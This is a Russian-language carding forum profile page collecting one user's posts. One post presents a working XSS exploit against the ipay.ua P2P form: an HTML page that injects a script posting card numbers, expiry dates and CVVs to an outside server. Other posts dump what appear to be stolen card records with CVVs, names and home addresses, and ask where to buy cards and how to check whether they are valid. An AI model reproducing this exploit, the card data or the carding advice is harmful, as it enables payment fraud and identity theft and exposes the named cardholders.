Акция 2021: Оплачиваем написание статей на кардинг тематику. Подробности
Перейти к содержанию
Искать в
  • Ещё...
Поиск результатов, которые содержат...
Поиск результатов в...

Lomakov

Пользователи
  • Публикаций

    22
  • Зарегистрирован

  • Посещение

Репутация

0 Neutral

Информация о Lomakov

  • Звание
    Пользователь

Посетители профиля

Блок последних пользователей отключён и не показывается другим пользователям.

  1. Статья - копи паст, но новичкам полезна
  2. Продолжая пинтестинг отечественных платежных систем, я остановился на довольно популярном в Украине платежном сервисе ipay.ua. Меня интересовало, на сколько PCI DSS сертификация платежными системами и проводимое ими ежеквартальное ASV-сканирование (в том числе на наличие XSS уязвимостей) гарантирует защиту данных клиентов. Моё внимание привлекла форма p2p переводов по адресу www.ipay.ua/ru/p2p. Проверяя форму на фильтрацию вводимых данных, я добрался до поля для комментария (оно по умолчанию скрыто, что бы оно появилось, нужно поставить курсор в поле «Телефон получателя»). Как обычно, для первичной проверки, начал вводить текст: Цитата <script>alert('XSS!') Мне стала интересна причина такого поведения страницы и я полез в её содержимое. Проанализировав javascript код я понял, что виной был следующий кусок: Цитата $("textarea[name=comment]").keyup(function() { comment = $(this).val(); $("textarea[name=comment]").html(comment); validComment(); }); А точнее, виной стало незнание разработчика, что jQuery конструктор или метод, который принимает на вход HTML строку, может потенциально выполнить код. Далее мне захотелось реализовать способ эксплуатации данной уязвимости, что бы стала возможной кража вводимых карточных данных, а точнее, отправка этих данных на сторонний сервер. Анализируя работу страницы для p2p переводов, я обнаружил, что можно при помощи POST запроса сформировать частично заполненную форму, подставив в поле комментария javascript код, который так же не валидировался на сервере (двойной фэйл разработчиков) Я создал html страничку со следующим содержимым: Отправив данные на сервер, я получил форму с заполненным полем для комментария. Теперь для того, что бы внедренный javascript код выполнился, достаточно начать редактировать содержимое поля(спасибо функции .keyup() библиотеки jQuery ). Осталось дело за малым: сформировать должным образом передаваемый javascript код, что бы он отправлял данные формы на сторонний сайт. Содержимое моей html странички приобрело следующий вид: Цитата <html> <body> <form action="https://www.ipay.ua/ru/p2p" method="post"> <input type="hidden" name="gate" value="P2pUpc"/> <input type="hidden" name="policy" value="1"/> <input type="hidden" name="cvv" value="123"/> <input type="hidden" name="amount" value="100"/> <input type="hidden" name="senderPan1" value="4444"/> <input type="hidden" name="senderPan2" value="5555"/> <input type="hidden" name="senderPan3" value="6666"/> <input type="hidden" name="senderPan4" value="1111"/> <input type="hidden" name="expMon" value="01"/> <input type="hidden" name="expYear" value="18"/> <input type="hidden" name="transfer-send" value="Выполнить перевод"/> <input type="hidden" name="comment" value=" <script> $.post('https://someverydang...Data.php',{ pan1:$('input[name=senderPan1]').val(), pan2:$('input[name=senderPan2]').val(), pan3:$('input[name=senderPan3]').val(), pan4:$('input[name=senderPan4]').val(), expMon:$('input[name=expMon]').val(), expYear:$('input[name=expYear]').val(), cvv:$('input[name=cvv]').val()}); </script>"/> <input type="submit"/> </form> </body> </html> Карточные данные в форме я заполнил заранее для простоты демонстрации. Теперь отправив эти данные на сервер ipay.ua, получим форму для p2p перевода, заполнив которую, наша жертва при попытке редактирования комментария (например при его удалении), отправит свои карточные данные на сторонний сервер:
  3. Lomakov

    подкиньте CC

    если человек, сам, не может найти, я помогу поискать
  4. brains & hands , самая лучшая програма!!!
  5. Lomakov

    подкиньте CC

    4744721012232454 CVV: 929 EXP: 05/18 First Name: SHUQIN Last Name: LUO DoB: N/A email: N/A Phone: N/A Country:Refunded USA State: NY City: Beekmantown ZIP: 12901 Address: 4113 Oak Drive
  6. Lomakov

    Раздача СС

    Может что то еще валид 4548181398728013 12/18 012 martina pacher hof 1 maria anzbach NOS 3034 Austria 6643081842 4548182925596030 10/17 111 Andreas Hbler Glein 11 Knittelfeld Steiermark 8720 Austria 4548182017706018 04/17 380 Wolf Eberle Kapellenweg 324 Weissenbach b.L. Steiermark 8940 Austria 66423457 4845181840006034 01/17 692 Lukas Gruener Gemeindestrae 4 Slden Tirol 6450 Austria --------------------------------------------------------------- 4220050806117835 08/15 193 patricia saturnino Mrs Patricia Kasiarz rua vice governador rubens ber Rio de Janeiro rio de janeiro 22451070 Brazil 4220040314201783 08/15 566 Jose H G Almendra Mr Jose Almendra Rua Dep Laercio Corte, 1200, a SP Sao Paulo 05706290 Brazil 4520340040854484 08/15 391 peter murk 19 jarvis dr. Port Hope Ontario L1A 4J8 Canada 9058855532 4520340039593234 02/16 093 Nadia Pona 3414 Laurie Drive Halifax NS B3L 3S1 CA 1-4388621236 5457499602390172 07/16 913 Rachelle Lefranc 576 Boulevard Cite-des-jeunes Gatineau QC J8Z 1L2 CA 1-8194201230
  7. Lomakov

    Где купить сс

    У меня сейчас нет, вот у него хороший пластик https://sprut.cc/user/27915-neyton/
  8. поделюсь, хорошо Сообщение отредактировал Lomakov: 30 May 2015 - 12:09
  9. Нашел хороший чекер, бесплатний, спасибо всем)
  10. Я так поняд, без затрат на валидность нельзя проверить
  11. А что такое Зароль карту?
  12. А где взять чекер?
  13. А что б деньги не тратить?
  14. Какие есть способы, проверять на валид картон?
×